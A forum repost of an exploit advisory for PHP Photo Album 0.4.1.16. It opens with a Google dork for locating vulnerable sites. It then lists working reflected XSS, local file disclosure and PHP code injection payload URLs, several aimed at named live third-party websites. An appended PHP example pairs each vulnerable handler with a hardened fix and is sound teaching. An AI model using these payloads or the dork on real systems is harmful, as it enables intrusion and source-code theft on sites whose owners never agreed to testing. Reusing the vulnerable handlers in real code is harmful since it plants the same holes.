PHP Photo Album 0.4.1.16 Cross Site Scripting / Disclosure

!nFiNiTe
Longtime Member
21 Feb 2011
----------------------------------------------------------------
PHP Photo Album <= (0.4.1.16) Multiple Disclosure Vulnerabilities
----------------------------------------------------------------

# Exploit Title: PHP Photo Album <= (0.4.1.16) Multiple Disclosure Vulnerabilities
# Google Dork: inurl:main.php?cmd=imageview&var1=
# Application Name: [PHP Photo Album]
# Date: 2011-10-29
# Author: BHG Security Center
# Home: Http://black-hg.org
# Software Link: [ http://www.phpalbum.net/dw ]
# Version: [ 0.4.1.16 ]
# Impact : [ High ]
# Tested on: [linux+apache]
# CVE : Webapps
# Finder(s):
    - Net.Edit0r (Net.edit0r [at] att [dot] net)
    - tHe.k!ll3r (Attack-bhg [at] att [dot] net)
    - 2MzRp  (mzrp2 [at] Yahoo [dot] com )

# Description: Given the vulnerability you want to read files on the server must have access

+-----------------------+
| Cross Site scripting  |
+-----------------------+

The vulnerable code is located in /www/main.php?cmd=imageview&var1=[XSS]


Proof of Concept:
-----------------


~ PoC : http://localhost/phpAlbum/main.php?cmd=imageview&var1=[XSS]

  ~ Demo : http://www.phpalbum.net/demo3/main.php?cmd=imageview&var1=<BODY ONLOAD=alert('XSS')>

~ Poc 2

http://localhost/phpAlbum/main.php?cmd=albumnew&keyword=[XSS]

  ~ Demo : http://www.iloveazucar.com/phpAlbum/main.php?cmd=albumnew&keyword="onmouseover%3dprompt(975554) bad%3d"

  ~ Demo : http://www.dolfpretorius.com/main.php?cmd=albumnew&keyword="onmouseover=prompt(975554) bad="

+----------------------+
| Download/Source Code |
+----------------------+

The vulnerable code is located in /www/main.php

Proof of Concept:
-----------------

~ PoC : http://localhost/phpAlbum/main.php?cmd=image&var1=[LFD]

~ PoC : http://localhost/phpAlbum/main.php?cmd=image&var1=../main.php

  ~ Demo : http://www.mihoby.org/phpAlbum/main.php?cmd=image&var1=../main.php

~ PoC 2 : http://localhost/main.php?cmd=themeimage&var1=[LFD]

  ~ Demo : http://www.dolfpretorius.com/main.php?cmd=themeimage&var1=comments.tpl.php
  ~ Demo : http://www.biochem.dal.ca/outreach/phpAlbum/main.php?cmd=themeimage&var1=login.tpl.php

# Important Notes:

The source of the PHP files is displayed in your browser (View Page Source)


+--------------------+
| PHP Code Injection |
+--------------------+

The vulnerable code is located in /www/main.php

124 :       Array
125 :       (
126 :              [0] => cmd=phpinfo
127 :        )


Proof of Concept:
-----------------

~ PoC : http://localhost/phpAlbum/main.php?cmd=phpinfo

~ PoC : http://localhost/demo3/main.php?keyword=hack&cmd=phpinfo

  ~ Demo : http://www.dolfpretorius.com/main.php?cmd=phpinfo

~ PoC 2 http://localhost/main.php?cmd=setquality&var1=[PHP Code Injection]

  ~ Demo : http://www.manufacturinget.com/album/main.php?cmd=setquality&var1=${@print(bhg)}\



[-] Disclosure timeline:

[12/10/2011] - Vulnerabilities discovered
[14/10/2011] - Other vulnerabilities discovered
[15/10/2011] - Issues reported to http://black-hg.org
[29/10/2011] - Public disclosure


# Greets To :

Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ 2MzRp ~
ArYaIeIrAn ~ Mikili

cmaxx ~ G3n3Rall ~ Mr.XHat ~  M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter
~ NoL1m1t

s3cure.p0rt ~ THANKS TO ALL Iranian HackerZ  ./Persian Gulf

===========================================[End]=============================================
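The advisory above gives URLs but no source, so here is an added example (written for this page, not phpAlbum's own code and not from BHG) that models the three bug classes it lists: reflected XSS through var1, local file disclosure through the themeimage handler, and PHP code injection through setquality. Each vulnerable handler sits beside a hardened one. The function names, the HTML context var1 is echoed into, and the assumption that the setquality value is written into a PHP config file as a double-quoted string and later include()d are all mine; the advisory does not show how the real application reaches the `${@print(bhg)}` evaluation.

```php
<?php
// Added example for this page, not phpAlbum's code. Handler names, output
// contexts and the config-file mechanism for "setquality" are assumptions.
declare(strict_types=1);

// 1. Reflected XSS: main.php?cmd=imageview&var1=<BODY ONLOAD=alert('XSS')>
function imageview_vulnerable(array $get): string
{
    $name = (string)($get['var1'] ?? '');
    return "<p>Image $name not found</p>";            // raw reflection into HTML text
}

function imageview_hardened(array $get): string
{
    $name = htmlspecialchars((string)($get['var1'] ?? ''), ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<p>Image $name not found</p>";            // < > " ' are now entities
}

// 2. Local file disclosure: main.php?cmd=themeimage&var1=login.tpl.php
function themeimage_vulnerable(string $themeDir, array $get)
{
    $file = (string)($get['var1'] ?? '');
    return file_get_contents($themeDir . '/' . $file); // any name, any extension, ../ allowed
}

function themeimage_hardened(string $themeDir, array $get)
{
    $file = basename((string)($get['var1'] ?? ''));   // strip any directory component
    if (!preg_match('/^[A-Za-z0-9_-]+\.(png|jpe?g|gif)$/i', $file)) {
        return false;                                  // only plain image file names
    }
    $base = realpath($themeDir);
    $real = realpath($themeDir . '/' . $file);
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;                                  // resolved path left the theme directory
    }
    return file_get_contents($real);
}

// 3. PHP code injection: main.php?cmd=setquality&var1=${@print(bhg)}
// Assumed mechanism: the value is written into a config file as a double-quoted
// PHP string and that file is include()d on later requests. PHP interpolates
// ${expr} inside double-quoted strings, so the injected expression executes.
function setquality_vulnerable(string $configFile, array $get): void
{
    $q = (string)($get['var1'] ?? '');
    file_put_contents($configFile, "<?php\n\$cfg['quality'] = \"$q\";\n");
}

function setquality_hardened(string $configFile, array $get): void
{
    $q = filter_var($get['var1'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 100]]);
    if ($q === false) {
        throw new InvalidArgumentException('quality must be an integer from 1 to 100');
    }
    // var_export() emits an integer literal; nothing is interpolated on include
    file_put_contents($configFile, "<?php\n\$cfg['quality'] = " . var_export($q, true) . ";\n");
}

function load_config(string $configFile): array
{
    $cfg = [];
    include $configFile;
    return $cfg;
}

// Demonstration on a scratch directory (constructed input, nothing from a real site)
$tmp = sys_get_temp_dir() . '/phpalbum_demo_' . getmypid();
mkdir($tmp);
file_put_contents("$tmp/login.tpl.php", "<?php /* template source */ ?>\n");

$xss = ['var1' => "<BODY ONLOAD=alert('XSS')>"];
echo imageview_vulnerable($xss), "\n";                 // the tag lands in the page as-is
echo imageview_hardened($xss), "\n";                   // &lt;BODY ONLOAD=alert(&#039;XSS&#039;)&gt;

var_dump(themeimage_vulnerable($tmp, ['var1' => 'login.tpl.php'])); // template source leaks
var_dump(themeimage_hardened($tmp, ['var1' => 'login.tpl.php']));   // bool(false)
var_dump(themeimage_hardened($tmp, ['var1' => '../main.php']));     // bool(false)

// The advisory's payload uses the bare word bhg; PHP 8 rejects an undefined
// constant, so it is quoted here. PHP 8.2+ also emits a deprecation notice for
// ${} interpolation, silenced below so the printed "bhg" is easy to spot.
setquality_vulnerable("$tmp/config.php", ['var1' => '${@print(\'bhg\')}']);
$old = error_reporting(E_ERROR);
load_config("$tmp/config.php");                        // prints: bhg
error_reporting($old);
echo "\n";

setquality_hardened("$tmp/config.php", ['var1' => '90']);
var_dump(load_config("$tmp/config.php")['quality']);   // int(90)

array_map('unlink', glob("$tmp/*"));
rmdir($tmp);
```

Run it with `php example.php`. The themeimage fix does two independent things on purpose: the whitelist regex rejects `.php` and `.tpl.php` names outright, and the realpath prefix check catches traversal even if the whitelist is later loosened. For setquality, validating the value as an integer and emitting it with var_export() removes the interpolation path entirely, which is the right fix whenever user data ends up inside generated PHP.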